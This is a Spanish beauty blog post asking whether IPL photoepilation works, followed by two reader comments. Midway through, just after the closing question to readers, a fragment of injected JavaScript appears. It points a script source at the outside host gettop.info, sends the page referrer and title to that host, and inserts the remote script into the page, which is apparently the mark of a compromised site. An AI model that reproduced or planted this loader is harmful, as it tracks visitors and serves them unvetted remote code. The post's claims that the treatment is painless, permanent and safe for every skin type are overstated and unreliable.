Salud y belleza » Belleza, Salud

¿La fotodepilación funciona?

2 Comentarios

fotodepilacionLa fotodepilación es un sistema depilatorio que se realiza aplicando luz sobre la piel y que permite eliminar el vello de determinadas partes del cuerpo sin sufrir dolor. Funciona gracias a la energía de luz pulsada que actúa sobre las células germinativas responsables del crecimiento del pelo. Esto provoca que el folículo se elimine de forma natural propiciando la depilación permanente porque inhibe la capacidad de reproducción del vello. La diferencia con la depilación láser es que la fotodepilación es más indolora y no quema la piel, por lo que se puede usar en todo tipo de pieles.

Normalmente se da una media de 5 o 6 sesiones espaciadas entre 1 y 3 meses. Después de estas sesiones notarán como el vello ha desaparecido de muchas zonas y que el que crece es muy débil. Con las primeras sesiones tarda mucho en crecer, un mes como mínimo. Después irá saliendo más vello que se mantenía oculto hasta que por fin apenas queden dos pelos en la zona que estemos fotodepilando.

Normalmente hay que volver a hacer sesiones de mantenimiento, 1 o 2 por año para eliminar algunos pelos más resistentes. La fotodepilación no es dolorosa, apenas molesta un poco y no necesita aplicar anestésicos.

fotodepilacion-axilasA pesar de que necesite sesiones de mantenimiento, en 5 sesiones se puede eliminar el 80 o 90% del vello de cualquier parte del cuerpo de forma indolora y permanente. Para hacer la fotodepilación adecuadamente es necesario no tomar el sol 1 semana antes y después y que el vello tenga entre 1 y 2 cm de longitud para que la luz entre bien en el folículo.

Podemos asegurar que la fotodepilación es efectiva, aunque a menudo depende de la cantidad y el espesor del vello de cada persona.

¿Has probado la fotodepilación? ¿Qué tal su eficacia?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : ,

2 Comments »

  • India said:

    A mi me funciona por ahora. Llevo 6 meses en la fotodepilación y por ahora estoy muy contenta. 5 sesiones y el vello casi ha desaparecido. Axiles e ingles. Mucho mejor que con la cuchilla todo el día. No es muy caro, me ha costado 120€ y ahora me doy sesiones cuando me crece el pelo cada 3 o 4 meses nada más para que se termine de eliminar pero la verdad es que es un lujazo. Lo recomiendo de verdad.

  • Tamara said:

    Yo llevo 3 sesiones, después de las 2 primeras no tenía vello pero en la tercera me salió. Dicen que es normal, que son pelos que estaban escondidos. Ya os contaré.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.